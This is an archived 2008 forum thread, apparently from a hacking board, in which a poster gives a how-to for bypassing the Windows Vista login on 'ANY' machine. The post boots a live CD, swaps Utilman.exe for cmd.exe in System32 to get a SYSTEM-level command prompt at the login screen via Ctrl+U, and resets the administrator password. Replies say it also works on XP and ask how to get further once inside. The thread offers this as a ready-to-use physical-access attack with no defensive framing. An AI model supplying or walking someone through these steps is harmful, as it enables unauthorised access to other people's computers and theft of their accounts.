Log in

View Full Version : HOWTO: Vista Admin Login bypass


warweed12
2008-11-12, 22:31
This is very simply done with almost ANY bootable livecd such as BackTrack presuming you have a terminal window your pretty much fine

once you have your live cd of choice walk up to ANY Vista machine and boot with the live cd once you have booted open a terminal window

input the following commands

cd /mnt
ls
cd sda1
cd Windows/
cd System32/
mv Utilman.exe Utilman.old
cp cmd.exe Utilman.exe
reboot


Here is a break down for the not so linux savy

cd /mnt - you crusing to the mounted file system directory

ls - listing the directorys

cd sda1 - your cruising over to sda1's directory

cd Windows - your moving into the windows directorys

cd System32 - your moving into the system32 folder


mv Utilman.exe Utilman.old - your using the move command to rename the file Utilman.exe to Utilman.old

cp cmd.exe utilman.exe - your coping the command prompt program in windows and renaming it utilman.exe

reboot - your rebooting your system to windows :P nows a good time to remove your live cd

now of course your windows partition might be sda1 sda2 sda3 w.e pick accordingly

when you are at the windows vista login screen hit Ctrl + U this would normally bring up the utility manager for disabled people but we put cmd.exe in it's place so now you have a command prompt

type whoami in the command prompt and hit enter you will be greated with "nt authority\system"

now type explorer and you will have a lovely start bar and everything :) goto control panel users and change your admin password to w.e you want do the 3 finger salute (ctrl alt del) goto processes kill explorer.exe and login to your system with your admin password and bam :)

whole process takes about 6 min time :)

cheers,

-warweed

Expl0itz
2008-11-13, 23:53
This is a few months old. I've been doing this trick for a while now. Works with XP too.

warweed12
2008-11-14, 19:58
oh :(

beergood
2008-11-17, 20:30
heh this doesn't work if a certain file system protection(don't think its fsp forget the name) is enabled(which is by default). otherwise nice try ;)

ssolo
2008-11-28, 01:45
When get into the computer I just use taskmgr cmd to bring up the task manager and minimize the logon screen (makes life easier), but does anyone know how to end the process completely, whenever I tried, it blinked and switched back to the logon window...
Also when I get in and click on buttons in start menu it doesn't do anything, just 'waits' and then nothing happens - so basically I can't gt into My Computer or control panel, etc., what I can do though is open programs from start menu, but then if i want to open a specific file the 'open' window turns up totally blank as if there are no drives or my computer, maybe this is because not all drivers are loaded, in this case how do I load them through cmd.exe?
BTW I could always activate the super admin account and go from there, but that takes time (even tough not much at all, but I still don't want to waste it).